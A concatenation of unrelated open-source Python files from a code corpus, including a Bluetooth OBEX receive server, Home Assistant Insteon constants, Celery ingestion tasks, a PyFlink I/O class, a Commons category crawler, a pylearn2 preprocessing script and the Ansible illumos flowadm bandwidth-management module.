initWithChannel_fileLikeObject_, signature="@@:i@")
def run(self):
self.__server.run()
# wait until client sends a file, or an error occurs
_macutil.waituntil(lambda: self.__gotfile or self.__error is not None)
# wait briefly for a disconnect request (client may have decided to just
# close the connection without sending a disconnect request)
if self.__error is None:
ok = _macutil.waituntil(lambda: self.__gotdisconnect, 3)
if ok:
_macutil.waituntil(lambda: self.__disconnected)
# only raise OBEXError if file was not received
if not self.__gotfile:
if self.__error is not None:
raise OBEXError(self.__error[0], self.__error[1])
# if client connected but didn't send PUT
raise OBEXError(_kOBEXGeneralError, "client did not send a file")
def __del__(self):
super(BBOBEXObjectPushServer, self).dealloc()
#
    # BBBluetoothOBEXServerDelegate methods follow.
# These enable this class to get callbacks when some event occurs on the
# server (e.g. got a new client request, or an error occurred, etc.).
#
# - (BOOL)server:(BBBluetoothOBEXServer *)server
# shouldHandleConnectRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandleConnectRequest_(self, server, requestheaders):
return True
server_shouldHandleConnectRequest_ = objc.selector(
server_shouldHandleConnectRequest_, signature="c@:@@")
# - (BOOL)server:(BBBluetoothOBEXServer *)server
# shouldHandleDisconnectRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandleDisconnectRequest_(self, server, requestheaders):
self.__gotdisconnect = True
_macutil.interruptwait()
return True
server_shouldHandleDisconnectRequest_ = objc.selector(
server_shouldHandleDisconnectRequest_, signature="c@:@@")
# - (void)serverDidHandleDisconnectRequest:(BBBluetoothOBEXServer *)server;
def serverDidHandleDisconnectRequest_(self, server):
self.__disconnected = True
_macutil.interruptwait()
serverDidHandleDisconnectRequest_ = objc.selector(
serverDidHandleDisconnectRequest_, signature="v@:@")
# - (NSOutputStream *)server:(BBBluetoothOBEXServer *)server
# shouldHandlePutRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandlePutRequest_(self, server, requestheaders):
#print "Incoming file:", requestHeaders.valueForNameHeader()
self.delegate = _macutil.BBFileLikeObjectWriter.alloc().initWithFileLikeObject_(self.__fileobject)
outstream = BBStreamingOutputStream.alloc().initWithDelegate_(self.delegate)
outstream.open()
return outstream
server_shouldHandlePutRequest_ = objc.selector(
server_shouldHandlePutRequest_, signature="@@:@@")
# - (void)server:(BBBluetoothOBEXServer *)server
# didHandlePutRequestForStream:(NSOutputStream *)outputStream
# requestWasAborted:(BOOL)aborted;
def server_didHandlePutRequestForStream_requestWasAborted_(self, server,
stream, aborted):
if aborted:
self.__error = (_kOBEXGeneralError, "client aborted file transfer")
else:
self.__gotfile = True
_macutil.interruptwait()
server_didHandlePutRequestForStream_requestWasAborted_ = objc.selector(
server_didHandlePutRequestForStream_requestWasAborted_,
signature="v@:@@c")
# - (void)server:(BBBluetoothOBEXServer *)server
# errorOccurred:(OBEXError)error
# description:(NSString *)description;
def server_errorOccurred_description_(self, server, error, desc):
self.__error = (error, desc)
_macutil.interruptwait()
server_errorOccurred_description_ = objc.selector(
server_errorOccurred_description_, signature="v@:@i@")
# ------------------------------------------------------------------
def recvfile(sock, dest):
if sock is None:
raise TypeError("Given socket is None")
if not isinstance(dest, (types.StringTypes, types.FileType)):
raise TypeError("dest must be string or file-like object with write() method")
if isinstance(dest, types.StringTypes):
fileobj = open(dest, "wb")
closefileobj = True
else:
fileobj = dest
closefileobj = False
try:
sock.listen(1)
conn, addr = sock.accept()
#print "A client connected:", addr
server = BBOBEXObjectPushServer.alloc().initWithChannel_fileLikeObject_(
conn._getchannel(), fileobj)
server.run()
conn.close()
finally:
if closefileobj:
fileobj.close()
| gpl-3.0 |
Teagan42/home-assistant | homeassistant/components/insteon/const.py | 2 | 2771 | """Constants used by insteon component."""
DOMAIN = "insteon"
INSTEON_ENTITIES = "entities"
CONF_IP_PORT = "ip_port"
CONF_HUB_USERNAME = "username"
CONF_HUB_PASSWORD = "password"
CONF_HUB_VERSION = "hub_version"
CONF_OVERRIDE = "device_override"
CONF_PLM_HUB_MSG = "Must configure either a PLM port or a Hub host"
CONF_CAT = "cat"
CONF_SUBCAT = "subcat"
CONF_FIRMWARE = "firmware"
CONF_PRODUCT_KEY = "product_key"
CONF_X10 = "x10_devices"
CONF_HOUSECODE = "housecode"
CONF_UNITCODE = "unitcode"
CONF_DIM_STEPS = "dim_steps"
CONF_X10_ALL_UNITS_OFF = "x10_all_units_off"
CONF_X10_ALL_LIGHTS_ON = "x10_all_lights_on"
CONF_X10_ALL_LIGHTS_OFF = "x10_all_lights_off"
SRV_ADD_ALL_LINK = "add_all_link"
SRV_DEL_ALL_LINK = "delete_all_link"
SRV_LOAD_ALDB = "load_all_link_database"
SRV_PRINT_ALDB = "print_all_link_database"
SRV_PRINT_IM_ALDB = "print_im_all_link_database"
SRV_X10_ALL_UNITS_OFF = "x10_all_units_off"
SRV_X10_ALL_LIGHTS_OFF = "x10_all_lights_off"
SRV_X10_ALL_LIGHTS_ON = "x10_all_lights_on"
SRV_ALL_LINK_GROUP = "group"
SRV_ALL_LINK_MODE = "mode"
SRV_LOAD_DB_RELOAD = "reload"
SRV_CONTROLLER = "controller"
SRV_RESPONDER = "responder"
SRV_HOUSECODE = "housecode"
SRV_SCENE_ON = "scene_on"
SRV_SCENE_OFF = "scene_off"
SIGNAL_LOAD_ALDB = "load_aldb"
SIGNAL_PRINT_ALDB = "print_aldb"
HOUSECODES = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
]
BUTTON_PRESSED_STATE_NAME = "onLevelButton"
EVENT_BUTTON_ON = "insteon.button_on"
EVENT_BUTTON_OFF = "insteon.button_off"
EVENT_CONF_BUTTON = "button"
STATE_NAME_LABEL_MAP = {
"keypadButtonA": "Button A",
"keypadButtonB": "Button B",
"keypadButtonC": "Button C",
"keypadButtonD": "Button D",
"keypadButtonE": "Button E",
"keypadButtonF": "Button F",
"keypadButtonG": "Button G",
"keypadButtonH": "Button H",
"keypadButtonMain": "Main",
"onOffButtonA": "Button A",
"onOffButtonB": "Button B",
"onOffButtonC": "Button C",
"onOffButtonD": "Button D",
"onOffButtonE": "Button E",
"onOffButtonF": "Button F",
"onOffButtonG": "Button G",
"onOffButtonH": "Button H",
"onOffButtonMain": "Main",
"fanOnLevel": "Fan",
"lightOnLevel": "Light",
"coolSetPoint": "Cool Set",
"heatSetPoint": "HeatSet",
"statusReport": "Status",
"generalSensor": "Sensor",
"motionSensor": "Motion",
"lightSensor": "Light",
"batterySensor": "Battery",
"dryLeakSensor": "Dry",
"wetLeakSensor": "Wet",
"heartbeatLeakSensor": "Heartbeat",
"openClosedRelay": "Relay",
"openClosedSensor": "Sensor",
"lightOnOff": "Light",
"outletTopOnOff": "Top",
"outletBottomOnOff": "Bottom",
"coverOpenLevel": "Cover",
}
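As a usage sketch, `STATE_NAME_LABEL_MAP` can turn a raw Insteon state name into a display label. The helper and the address format below are illustrative assumptions, not part of the component:

```python
# Illustrative helper: derive a display name for an entity from its
# Insteon address and state name (a small excerpt of the map above is
# inlined to keep the sketch self-contained).
STATE_NAME_LABEL_MAP = {
    "keypadButtonA": "Button A",
    "lightOnLevel": "Light",
    "motionSensor": "Motion",
}

def entity_label(address, state_name):
    # Fall back to the raw state name for unmapped states.
    label = STATE_NAME_LABEL_MAP.get(state_name, state_name)
    return "%s %s" % (address, label)

print(entity_label("1A2B3C", "keypadButtonA"))  # 1A2B3C Button A
print(entity_label("1A2B3C", "statusReport"))   # 1A2B3C statusReport
```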
| apache-2.0 |
Luthien123/aleph | aleph/processing/__init__.py | 3 | 1728 | import logging
from archivekit.ingest import Ingestor
from aleph.core import archive, celery
from aleph.processing.pipeline import make_pipeline # noqa
log = logging.getLogger(__name__)
@celery.task()
def ingest_url(collection_name, url, package_id=None, meta={}):
collection = archive.get(collection_name)
meta['source_url'] = url
log.info("Ingesting URL: %r to %r", url, collection)
ingest(collection, url, package_id=package_id, meta=meta)
def ingest(collection, something, package_id=None, meta={}):
for ingestor in Ingestor.analyze(something):
try:
if package_id is None:
package_id = ingestor.hash()
package = collection.get(package_id)
package.ingest(ingestor, meta=meta)
process_package.delay(collection.name, package.id)
except Exception, e:
log.exception(e)
finally:
ingestor.dispose()
@celery.task()
def process_collection(collection_name, overwrite=False):
collection = archive.get(collection_name)
for package in collection:
process_package.delay(collection_name, package.id,
overwrite=overwrite)
@celery.task()
def process_package(collection_name, package_id, overwrite=False):
collection = archive.get(collection_name)
package = collection.get(package_id)
    if not package.exists():
        log.warn("Package doesn't exist: %r", package_id)
        return
    log.info("Processing package: %r", package)
pipeline = make_pipeline(collection, overwrite=overwrite)
pipeline.process_package(package)
@celery.task()
def refresh_selectors(selectors):
from aleph.processing.entities import refresh
refresh(selectors)
| mit |
godfreyhe/flink | flink-python/pyflink/fn_execution/ResettableIO.py | 10 | 2606 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import io
class ResettableIO(io.RawIOBase):
"""
Raw I/O implementation the input and output stream is resettable.
"""
def set_input_bytes(self, b):
self._input_bytes = b
self._input_offset = 0
self._size = len(b)
def readinto(self, b):
"""
Read up to len(b) bytes into the writable buffer *b* and return
the number of bytes read. If no bytes are available, None is returned.
"""
output_buffer_len = len(b)
remaining = self._size - self._input_offset
if remaining >= output_buffer_len:
b[:] = self._input_bytes[self._input_offset:self._input_offset + output_buffer_len]
self._input_offset += output_buffer_len
return output_buffer_len
elif remaining > 0:
b[:remaining] = self._input_bytes[self._input_offset:self._input_offset + remaining]
self._input_offset = self._size
return remaining
else:
return None
def set_output_stream(self, output_stream):
self._output_stream = output_stream
def write(self, b):
"""
Write the given bytes or pyarrow.Buffer object *b* to the underlying
output stream and return the number of bytes written.
"""
if isinstance(b, bytes):
self._output_stream.write(b)
else:
# pyarrow.Buffer
self._output_stream.write(b.to_pybytes())
return len(b)
def seekable(self):
return False
def readable(self):
return self._size - self._input_offset
def writable(self):
return True
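The `readinto()` contract above (copy up to `len(b)` bytes into the caller's buffer, return the count, or `None` when the input is exhausted) can be exercised with a minimal self-contained re-implementation. The class name is illustrative, not part of the Flink module:

```python
import io

class MiniResettableInput(io.RawIOBase):
    # Minimal re-implementation of the readinto() logic above.
    def set_input_bytes(self, b):
        self._buf = b
        self._off = 0

    def readinto(self, out):
        # Copy at most len(out) of the remaining bytes into out.
        n = min(len(out), len(self._buf) - self._off)
        if n <= 0:
            return None
        out[:n] = self._buf[self._off:self._off + n]
        self._off += n
        return n

stream = MiniResettableInput()
stream.set_input_bytes(b"hello world")
buf = bytearray(4)
print(stream.readinto(buf), bytes(buf))  # 4 b'hell'
```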
| apache-2.0 |
Commonists/Commons2Data | categories.py | 1 | 2651 | # -*- coding: utf-8 -*-
import logging
import json
import sys
import requests
import pywikibot
from pywikibot import page
commons = pywikibot.Site('commons', 'commons')
tree = {}
nbCalls = 0
frequency = 50
# Logger logging on console and in debug
LOG = logging.getLogger("categories")
LOG_LEVEL = logging.DEBUG
consolehandler = logging.StreamHandler(stream=sys.stdout)
fmt = '%(asctime)s %(levelname)s %(message)s'
consolehandler.setFormatter(logging.Formatter(fmt))
consolehandler.setLevel(LOG_LEVEL)
LOG.addHandler(consolehandler)
LOG.setLevel(LOG_LEVEL)
def flush():
    LOG.info("Writing")
    with open("tree.json", "w") as data:
json.dump(tree, data)
def build_tree(category, children_depth=0, parents_depth=0, with_files=False):
global nbCalls
nbCalls = nbCalls + 1
if (nbCalls % frequency) == 0:
flush()
if category not in tree:
LOG.info(category)
node = {}
parents = [p.title() for p in
page.Category(commons, category).categories()]
node["Parents"] = parents
children = [p.title() for p in
page.Category(commons, category).subcategories()]
node["Children"] = children
tree[category] = node
if children_depth > 0:
for child in children:
build_tree(child, children_depth-1, parents_depth)
if parents_depth > 0:
for parent in parents:
                build_tree(parent, children_depth, parents_depth-1)
        if with_files:
            # Placeholder: per-file handling is not implemented; using
            # articles() as the member iterator is an assumption.
            for member in page.Category(commons, category).articles():
                pass
def paintings_by_year():
taboo=[u"Paintings by artist by year",
"Paintings by country by year",
"Paintings by genre by year",
"Paintings by style by year",
"Paintings by technique by year",
"Paintings by year by artist",
"Paintings by year by country",
"Paintings not categorised by year",
"Paintings with years of production (artist)",
"Paintings of people by year",
"Paintings from the United States by year"]
''' "Properties": {
"P31": {
"Value": "Q3305213"
},
"P571": {
"Value": {
"Year":1912
}
}'''
    motherCat = page.Category(commons, "Paintings by year")
    for cat in motherCat.subcategories():
        if cat.title() not in taboo:
            tree.setdefault(cat.title(), {})
def main():
categories =[u"Lena temp2"]
if len(tree) > 0:
LOG.info("Already %d elements",len(tree))
LOG.info("Building tree")
for category in categories:
build_tree(category, children_depth=1, parents_depth=1, with_files=True)
flush()
if __name__ == "__main__":
main()
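The recursive walk in `build_tree()` can be sketched against a small in-memory graph instead of pywikibot. All category names and the `GRAPH` structure below are made up for illustration; the function mirrors the depth-limited recursion above:

```python
# Fake in-memory category graph standing in for the pywikibot calls.
GRAPH = {
    "Paintings": {"parents": ["Art"], "children": ["Oil paintings"]},
    "Art": {"parents": [], "children": ["Paintings"]},
    "Oil paintings": {"parents": ["Paintings"], "children": []},
}
tree = {}

def build_tree(cat, children_depth=0, parents_depth=0):
    if cat not in tree:
        node = GRAPH[cat]
        tree[cat] = {"Parents": node["parents"], "Children": node["children"]}
        if children_depth > 0:
            for child in node["children"]:
                build_tree(child, children_depth - 1, parents_depth)
        if parents_depth > 0:
            for parent in node["parents"]:
                build_tree(parent, children_depth, parents_depth - 1)

build_tree("Paintings", children_depth=1, parents_depth=1)
print(sorted(tree))  # ['Art', 'Oil paintings', 'Paintings']
```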
| mit |
fishcorn/pylearn2 | pylearn2/scripts/datasets/make_cifar100_patches_8x8.py | 41 | 2282 | """
This script makes a dataset of two million approximately whitened patches,
extracted at random uniformly from the CIFAR-100 train dataset.
This script is intended to reproduce the preprocessing used by Adam Coates
et. al. in their work from the first half of 2011 on the CIFAR-10 and
STL-10 datasets.
"""
from __future__ import print_function
from pylearn2.utils import serial
from pylearn2.datasets import preprocessing
from pylearn2.datasets.cifar100 import CIFAR100
from pylearn2.utils import string
data_dir = string.preprocess('${PYLEARN2_DATA_PATH}')
print('Loading CIFAR-100 train dataset...')
data = CIFAR100(which_set='train')
print("Preparing output directory...")
patch_dir = data_dir + '/cifar100/cifar100_patches_8x8'
serial.mkdir(patch_dir)
README = open(patch_dir + '/README', 'w')
README.write("""
The .pkl files in this directory may be opened in python using
cPickle, pickle, or pylearn2.serial.load.
data.pkl contains a pylearn2 Dataset object defining an unlabeled
dataset of 2 million 8x8 approximately whitened, contrast-normalized
patches drawn uniformly at random from the CIFAR-100 train set.
preprocessor.pkl contains a pylearn2 Pipeline object that was used
to extract the patches and approximately whiten / contrast normalize
them. This object is necessary when extracting features for
supervised learning or test set classification, because the
extracted features must be computed using inputs that have been
whitened with the ZCA matrix learned and stored by this Pipeline.
They were created with the pylearn2 script make_cifar100_patches.py.
All other files in this directory, including this README, were
created by the same script and are necessary for the other files
to function correctly.
""")
README.close()
print("Preprocessing the data...")
pipeline = preprocessing.Pipeline()
pipeline.items.append(
preprocessing.ExtractPatches(patch_shape=(8, 8), num_patches=2*1000*1000))
pipeline.items.append(
preprocessing.GlobalContrastNormalization(sqrt_bias=10., use_std=True))
pipeline.items.append(preprocessing.ZCA())
data.apply_preprocessor(preprocessor=pipeline, can_fit=True)
data.use_design_loc(patch_dir + '/data.npy')
serial.save(patch_dir + '/data.pkl', data)
serial.save(patch_dir + '/preprocessor.pkl', pipeline)
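The `GlobalContrastNormalization` step configured above subtracts each patch's mean and divides by a bias-stabilized scale. A rough NumPy sketch of that transform (a simplification of pylearn2's implementation, with `sqrt_bias=10.` and `use_std=True` as in the script):

```python
import numpy as np

def global_contrast_normalize(X, sqrt_bias=10., use_std=True):
    # X: one row per patch. Center each row, then rescale it.
    X = X - X.mean(axis=1, keepdims=True)
    if use_std:
        scale = np.sqrt(sqrt_bias + X.var(axis=1, keepdims=True))
    else:
        scale = np.sqrt(sqrt_bias + (X ** 2).sum(axis=1, keepdims=True))
    return X / scale

patches = np.random.RandomState(0).rand(5, 64)
out = global_contrast_normalize(patches)
print(out.shape)  # (5, 64)
```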
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/illumos/flowadm.py | 50 | 15277 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam Števko <adam.stevko@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: flowadm
short_description: Manage bandwidth resource control and priority for protocols, services and zones on Solaris/illumos systems
description:
- Create/modify/remove networking bandwidth and associated resources for a type of traffic on a particular link.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description: >
- A flow is defined as a set of attributes based on Layer 3 and Layer 4
headers, which can be used to identify a protocol, service, or a zone.
required: true
aliases: [ 'flow' ]
link:
description:
            - Specifies a link to configure the flow on.
required: false
local_ip:
description:
- Identifies a network flow by the local IP address.
required: false
    remote_ip:
description:
- Identifies a network flow by the remote IP address.
required: false
transport:
description: >
- Specifies a Layer 4 protocol to be used. It is typically used in combination with I(local_port) to
identify the service that needs special attention.
required: false
local_port:
description:
- Identifies a service specified by the local port.
required: false
dsfield:
description: >
- Identifies the 8-bit differentiated services field (as defined in
RFC 2474). The optional dsfield_mask is used to state the bits of interest in
the differentiated services field when comparing with the dsfield
value. Both values must be in hexadecimal.
required: false
maxbw:
description: >
- Sets the full duplex bandwidth for the flow. The bandwidth is
specified as an integer with one of the scale suffixes(K, M, or G
for Kbps, Mbps, and Gbps). If no units are specified, the input
value will be read as Mbps.
required: false
priority:
description:
- Sets the relative priority for the flow.
required: false
default: 'medium'
choices: [ 'low', 'medium', 'high' ]
temporary:
description:
- Specifies that the configured flow is temporary. Temporary
flows do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create/delete/enable/disable an IP address on the network interface.
required: false
default: present
choices: [ 'absent', 'present', 'resetted' ]
'''
EXAMPLES = '''
# Limit SSH traffic to 100M via vnic0 interface
- flowadm:
link: vnic0
flow: ssh_out
transport: tcp
local_port: 22
maxbw: 100M
state: present
# Reset flow properties
- flowadm:
name: dns
state: resetted
# Configure policy for EF PHB (DSCP value of 101110 from RFC 2598) with a bandwidth of 500 Mbps and a high priority.
- flowadm:
link: bge0
dsfield: '0x2e:0xfc'
maxbw: 500M
priority: high
flow: efphb-flow
state: present
'''
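The dsfield examples above use the `value[:mask]` hexadecimal form from RFC 2474. A sketch of parsing that attribute (the helper name is illustrative, not part of the module):

```python
def parse_dsfield(dsfield):
    # "0x2e:0xfc" -> (value, mask); with no mask given, match all bits.
    if ":" in dsfield:
        dsval, dsmask = dsfield.split(":")
    else:
        dsval, dsmask = dsfield, "0xff"
    return int(dsval, 16), int(dsmask, 16)

print(parse_dsfield("0x2e:0xfc"))  # (46, 252)
print(parse_dsfield("0x2e"))       # (46, 255)
```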
RETURN = '''
name:
description: flow name
returned: always
type: string
sample: "http_drop"
link:
description: flow's link
returned: if link is defined
type: string
sample: "vnic0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: flow's persistence
returned: always
type: boolean
sample: "True"
priority:
description: flow's priority
returned: if priority is defined
type: string
sample: "low"
transport:
description: flow's transport
returned: if transport is defined
type: string
sample: "tcp"
maxbw:
description: flow's maximum bandwidth
returned: if maxbw is defined
type: string
sample: "100M"
local_ip:
description: flow's local IP address
returned: if local_ip is defined
type: string
sample: "10.0.0.42"
local_port:
description: flow's local port
returned: if local_port is defined
type: int
sample: 1337
remote_ip:
description: flow's remote IP address
returned: if remote_ip is defined
type: string
sample: "10.0.0.42"
dsfield:
description: flow's differentiated services value
returned: if dsfield is defined
type: string
sample: "0x2e:0xfc"
'''
import socket
SUPPORTED_TRANSPORTS = ['tcp', 'udp', 'sctp', 'icmp', 'icmpv6']
SUPPORTED_PRIORITIES = ['low', 'medium', 'high']
SUPPORTED_ATTRIBUTES = ['local_ip', 'remote_ip', 'transport', 'local_port', 'dsfield']
SUPPORTPED_PROPERTIES = ['maxbw', 'priority']
class Flow(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.link = module.params['link']
self.local_ip = module.params['local_ip']
self.remote_ip = module.params['remote_ip']
self.transport = module.params['transport']
self.local_port = module.params['local_port']
self.dsfield = module.params['dsfield']
self.maxbw = module.params['maxbw']
self.priority = module.params['priority']
self.temporary = module.params['temporary']
self.state = module.params['state']
self._needs_updating = {
'maxbw': False,
'priority': False,
}
@classmethod
def is_valid_port(cls, port):
return 1 <= int(port) <= 65535
@classmethod
def is_valid_address(cls, ip):
        netmask = None
        if ip.count('/') == 1:
            ip_address, netmask = ip.split('/')
        else:
            ip_address = ip
        if len(ip_address.split('.')) == 4:
            try:
                socket.inet_pton(socket.AF_INET, ip_address)
            except socket.error:
                return False
            if netmask is not None and not 0 <= int(netmask) <= 32:
                return False
        else:
            try:
                socket.inet_pton(socket.AF_INET6, ip_address)
            except socket.error:
                return False
            if netmask is not None and not 0 <= int(netmask) <= 128:
                return False
        return True
@classmethod
def is_hex(cls, number):
try:
int(number, 16)
except ValueError:
return False
return True
@classmethod
    def is_valid_dsfield(cls, dsfield):
        # dsfield is either a bare hex value or a 'value:mask' pair.
        dsmask = None
        if dsfield.count(':') == 1:
            dsval, dsmask = dsfield.split(':')
        else:
            dsval = dsfield
        if not cls.is_hex(dsval) or not 0x01 <= int(dsval, 16) <= 0xff:
            return False
        if dsmask is not None and (
                not cls.is_hex(dsmask) or not 0x01 <= int(dsmask, 16) <= 0xff):
            return False
        return True
def flow_exists(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flow')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
        return rc == 0
def delete_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('remove-flow')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def create_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('add-flow')
cmd.append('-l')
cmd.append(self.link)
if self.local_ip:
cmd.append('-a')
cmd.append('local_ip=' + self.local_ip)
if self.remote_ip:
cmd.append('-a')
cmd.append('remote_ip=' + self.remote_ip)
if self.transport:
cmd.append('-a')
cmd.append('transport=' + self.transport)
if self.local_port:
cmd.append('-a')
cmd.append('local_port=' + self.local_port)
if self.dsfield:
cmd.append('-a')
cmd.append('dsfield=' + self.dsfield)
if self.maxbw:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def _query_flow_props(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flowprop')
cmd.append('-c')
cmd.append('-o')
cmd.append('property,possible')
cmd.append(self.name)
return self.module.run_command(cmd)
def flow_needs_udpating(self):
(rc, out, err) = self._query_flow_props()
NEEDS_UPDATING = False
if rc == 0:
properties = (line.split(':') for line in out.rstrip().split('\n'))
for prop, value in properties:
if prop == 'maxbw' and self.maxbw != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
elif prop == 'priority' and self.priority != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
return NEEDS_UPDATING
else:
self.module.fail_json(msg='Error while checking flow properties: %s' % err,
stderr=err,
rc=rc)
def update_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('set-flowprop')
if self.maxbw and self._needs_updating['maxbw']:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority and self._needs_updating['priority']:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
    def reset_flow(self):
        # flowadm(1M) resets configured flow properties via 'reset-flowprop';
        # this method backs the 'resetted' state handled in main().
        cmd = [self.module.get_bin_path('flowadm')]
        cmd.append('reset-flowprop')
        if self.temporary:
            cmd.append('-t')
        cmd.append(self.name)
        return self.module.run_command(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True, aliases=['flow']),
link=dict(required=False),
local_ip=dict(required=False),
remote_ip=dict(required=False),
transport=dict(required=False, choices=SUPPORTED_TRANSPORTS),
local_port=dict(required=False),
dsfield=dict(required=False),
maxbw=dict(required=False),
priority=dict(required=False,
default='medium',
choices=SUPPORTED_PRIORITIES),
temporary=dict(default=False, type='bool'),
state=dict(required=False,
default='present',
choices=['absent', 'present', 'resetted']),
),
mutually_exclusive=[
('local_ip', 'remote_ip'),
('local_ip', 'transport'),
('local_ip', 'local_port'),
('local_ip', 'dsfield'),
('remote_ip', 'transport'),
('remote_ip', 'local_port'),
('remote_ip', 'dsfield'),
('transport', 'dsfield'),
('local_port', 'dsfield'),
],
supports_check_mode=True
)
flow = Flow(module)
rc = None
out = ''
err = ''
result = {}
result['name'] = flow.name
result['state'] = flow.state
result['temporary'] = flow.temporary
if flow.link:
result['link'] = flow.link
if flow.maxbw:
result['maxbw'] = flow.maxbw
if flow.priority:
result['priority'] = flow.priority
    if flow.local_ip:
        if flow.is_valid_address(flow.local_ip):
            result['local_ip'] = flow.local_ip
        else:
            module.fail_json(msg='Invalid local_ip: %s' % flow.local_ip,
                             rc=1)
    if flow.remote_ip:
        if flow.is_valid_address(flow.remote_ip):
            result['remote_ip'] = flow.remote_ip
        else:
            module.fail_json(msg='Invalid remote_ip: %s' % flow.remote_ip,
                             rc=1)
if flow.transport:
result['transport'] = flow.transport
if flow.local_port:
if flow.is_valid_port(flow.local_port):
result['local_port'] = flow.local_port
else:
module.fail_json(msg='Invalid port: %s' % flow.local_port,
rc=1)
if flow.dsfield:
if flow.is_valid_dsfield(flow.dsfield):
result['dsfield'] = flow.dsfield
else:
module.fail_json(msg='Invalid dsfield: %s' % flow.dsfield,
rc=1)
if flow.state == 'absent':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.delete_flow()
if rc != 0:
module.fail_json(msg='Error while deleting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'present':
if not flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.create_flow()
if rc != 0:
module.fail_json(msg='Error while creating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
else:
if flow.flow_needs_udpating():
(rc, out, err) = flow.update_flow()
if rc != 0:
module.fail_json(msg='Error while updating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'resetted':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.reset_flow()
if rc != 0:
module.fail_json(msg='Error while resetting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
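The module's `is_valid_dsfield` helper is intended to accept either a bare hex value (e.g. `0x2e`) or a `value:mask` pair (e.g. `0x2e:0xfc`, the documented sample), with both halves in the range 0x01..0xff. A standalone sketch of that validation rule, outside the module (the function name here is illustrative, not part of the module's API):

```python
def is_valid_dsfield(dsfield):
    """Validate a DS field given as 'value' or 'value:mask' in hex.

    Every present part must parse as hex and fall within 0x01..0xff.
    """
    dsval, _, dsmask = dsfield.partition(':')
    parts = [dsval] + ([dsmask] if dsmask else [])
    try:
        values = [int(part, 16) for part in parts]
    except ValueError:
        return False
    return all(0x01 <= value <= 0xff for value in values)
```

For example, `is_valid_dsfield('0x2e:0xfc')` holds while `is_valid_dsfield('0x100')` does not, since 0x100 exceeds the one-byte range.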
imaculate/scikit-learn | examples/applications/plot_species_distribution_modeling.py | 55 | 7386 | """
=============================
Species distribution modeling
=============================
Modeling species' geographic distributions is an important
problem in conservation biology. In this example we
model the geographic distribution of two south american
mammals given past observations and 14 environmental
variables. Since we have only positive examples (there are
no unsuccessful observations), we cast this problem as a
density estimation problem and use the `OneClassSVM` provided
by the package `sklearn.svm` as our modeling tool.
The dataset is provided by Phillips et. al. (2006).
If available, the example uses
`basemap <http://matplotlib.org/basemap>`_
to plot the coast lines and national boundaries of South America.
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
<http://www.iucnredlist.org/details/13408/0>`_ ,
also known as the Forest Small Rice Rat, a rodent that lives in Peru,
Colombia, Ecuador, and Venezuela.
References
----------
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
